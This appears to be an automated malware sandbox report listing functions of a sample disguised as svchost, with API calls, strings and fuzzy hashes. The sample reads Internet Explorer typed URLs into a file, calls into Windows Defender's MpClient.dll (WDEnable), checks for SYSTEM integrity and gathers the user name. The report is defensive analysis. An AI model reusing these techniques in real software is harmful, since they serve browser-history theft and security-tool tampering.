                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                    • SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Module32First.KERNEL32(00000000,?), ref: 00401D1A
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kernel), ref: 00401D3C
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401D48
                                                                                                                                                                                                                    • Module32Next.KERNEL32(00000000,00000224), ref: 00401D56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                    • String ID: .dll$kernel
                                                                                                                                                                                                                    • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                    • Opcode ID: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                                    • Instruction ID: 6b572b3e0c1d36d44cadbb52a12c0b3f1dd55c4915d11e4f0b3c307bdf2881c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e763791af0f1b55d9a70bbaeb0f15e26afb3baf3eac05cd15eefe00859f8061
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21B972A0111467D7109BA5AD49B9E77A8EF89720F100276EA04F32E0EB34DD4556A9
                                                                                                                                                                                                                    Function 02C747E0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105fileregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?,00000000), ref: 02C74803
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7482B
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,762335B0), ref: 02C74862
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,IE history:,0000000C,02C74FAE,00000000), ref: 02C7488C
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3BE4,00000001,02C74FAE,00000000), ref: 02C7489E
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,02C74FAE,00000000), ref: 02C748CA
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C74FAE,00000000), ref: 02C748DC
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C748F7
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C7490D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite$_snprintf$CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID: IE history:$Software\Microsoft\Internet Explorer\TypedURLs$url%i
                                                                                                                                                                                                                    • API String ID: 4020389783-427538202
                                                                                                                                                                                                                    • Opcode ID: 2409a2a58dad3d092fe5c93e69396275017a5f2c59c8dff11b4eff0586436599
                                                                                                                                                                                                                    • Instruction ID: 1b95446c8a17b725b57605333fab497b60f51914e9535f3550e19f0a27500698
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2409a2a58dad3d092fe5c93e69396275017a5f2c59c8dff11b4eff0586436599
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF313DB1D4025DBBEB25DF94DC89FEEB77CEF44704F00459AA605A3141E7B05B548BA0
                                                                                                                                                                                                                    Function 02C76570 Relevance: 19.6, APIs: 13, Instructions: 117memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 995291462-0
                                                                                                                                                                                                                    • Opcode ID: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
                                                                                                                                                                                                                    • Instruction ID: a6d5ba3fe5b7dc7c35c181564afb746dc971d058794fad2efa10cf46b787aa8d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fe15c0747de02ce34ff8e5beb352f5bb594d70fcf48db425afb91261f065212
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3310372E40254BBDB218FA59C48FABBB7CEF80B14F108658FD14A7280D7308A148BA0
                                                                                                                                                                                                                    Function 02C76240 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 109registrymemorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76271
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7628F
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,80F50759a,00000000,00000001,?,00000104), ref: 02C762D2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C76351
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76365
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C7638C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                    • String ID: 80F50759a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 217510255-3483679399
                                                                                                                                                                                                                    • Opcode ID: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
                                                                                                                                                                                                                    • Instruction ID: 3471b68e4a835b0fa5063bde680b29b635e56a2b8e81eeee3e7ffb16df0b7b1c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ab6c0d8ec864cb4832094607e0000585e37440257ed7e1af13c71dc892abea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD310871E4026D6AEB26DB649C09BDE7B6CEF04704F100599EA1DE7141E7B08B44CBE1
                                                                                                                                                                                                                    Function 02C760E0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102registrymemorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76111
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7612F
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(00000001,software\microsoft,00000000,00000101,80000001,?,?,?,?,?,00000000), ref: 02C7614A
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(80000001,80F50759a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C76171
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C761EA
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C761F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76205
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C7621E
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000001,?,?,?,?,?,00000000), ref: 02C7622C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                                    • String ID: 80F50759a$software\microsoft
                                                                                                                                                                                                                    • API String ID: 217510255-3483679399
                                                                                                                                                                                                                    • Opcode ID: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
                                                                                                                                                                                                                    • Instruction ID: 01ab0bc2ad4d45cd08dc3ae6a38c052b133b4db611de5721e0a942fd5e20b490
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9f789d853990c049af5dfef2ec7b45426995e795e6d08b56affd9dba607a23
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41312871E8025C6BDB26DB64DC49FDE7BACEF18704F104598E609E7141E3B08B448BA1
                                                                                                                                                                                                                    Function 02C92E00 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,7622F550,00000000,7736C3F0), ref: 02C92E15
                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000010,?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E2C
                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02C92E4A
                                                                                                                                                                                                                    • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E62
                                                                                                                                                                                                                    • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02C84683), ref: 02C92E88
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00000000), ref: 02C92EBB
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02C92ECC
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C92EDE
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C92EEF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Information$CharCloseOpenProcessTokenUpper
                                                                                                                                                                                                                    • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                                    • API String ID: 1998047302-3691563785
                                                                                                                                                                                                                    • Opcode ID: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
                                                                                                                                                                                                                    • Instruction ID: 7f2bd8690ff1dfab9be954a6c89663d6062ef08d3c0c7ee721daf379dcadf0f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 277415a8bfd86d7e02d0b9444cd21f2e95ce17a10e53a131167fe95a68d94b56
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C531A171D40288BBEF11CBA1C88CFBE7B7CAF85306F048598ED8667181D7749615CB62
                                                                                                                                                                                                                    Function 00401FC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 00402037
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402046
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                    • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                                    • API String ID: 1010965793-4204822615
                                                                                                                                                                                                                    • Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                                    • Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8
                                                                                                                                                                                                                    Function 00402560 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                                    • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                    • String ID: Windows Explorer
                                                                                                                                                                                                                    • API String ID: 1140695583-228612681
                                                                                                                                                                                                                    • Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                                    • Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94
                                                                                                                                                                                                                    Function 02C934A0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                                      • Part of subcall function 02C82D50: GetProcessHeap.KERNEL32(00000008,02C93547,00000000,75B534D0,7736C3F0,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D6E
                                                                                                                                                                                                                      • Part of subcall function 02C82D50: HeapAlloc.KERNEL32(00000000,?,02C93534,00000104,?,?,?,?,00000000), ref: 02C82D75
                                                                                                                                                                                                                      • Part of subcall function 02C82D50: memset.MSVCRT ref: 02C82D85
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                                    • StrChrIA.SHLWAPI(?,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(7736C3F0,00000001,00000104,?,7736C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02C934B0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                                    • API String ID: 2345603349-374730529
                                                                                                                                                                                                                    • Opcode ID: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
                                                                                                                                                                                                                    • Instruction ID: 5d39b8423ee337d5eb484f8bc5143e6573950741a925296a020dcb575222c5bd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dcbabfa9400dc68fbcb5f2ba2501b4ff664f283a69539205937ccd9fc760b11b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF217B72D0014AA7CF12A6549C48BFBB7BD9FC8B05F1005D9E94593140EB70EB058BA1
                                                                                                                                                                                                                    Function 02C81330 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C81347
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,7622F550,00000000), ref: 02C8135E
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,?,7622F550,00000000), ref: 02C8136B
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?,?,7622F550,00000000), ref: 02C813A7
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(02CC7C28,00000000,00000104,00000000,00000001,?,7622F550,00000000), ref: 02C813D1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813E0
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813E3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,7622F550,00000000), ref: 02C813F0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,7622F550,00000000), ref: 02C813F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                                    • String ID: 80f50249a
                                                                                                                                                                                                                    • API String ID: 780088666-2796344140
                                                                                                                                                                                                                    • Opcode ID: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
                                                                                                                                                                                                                    • Instruction ID: 874ce55ae577560d7386450904837d24a7f509fa39a457052b45d97fe50e9868
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47afdaadcf33957278c797cc9d22dbdd61c09cfa1bb999e8302c62257340366a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1110671F8425967EB2166259C09FDBBBECDF80B05F044694F98DEB1C0DEE099858BD0
                                                                                                                                                                                                                    Function 02C832F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02C83432
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                                    • String ID: software\microsoft
                                                                                                                                                                                                                    • API String ID: 1484339481-3673152959
                                                                                                                                                                                                                    • Opcode ID: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
                                                                                                                                                                                                                    • Instruction ID: 23968d54473004be1a826ad79e5164d9663e5341a45f5565242fb56e15f19d55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffc6f798f5a69eaf18ca008539c899796092b0a2bde6652e46702e492edf175d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A141C832E001999BDB26DA649D09FDABBB89FC1F08F0491D5ED44A7100DB70DB058BA1
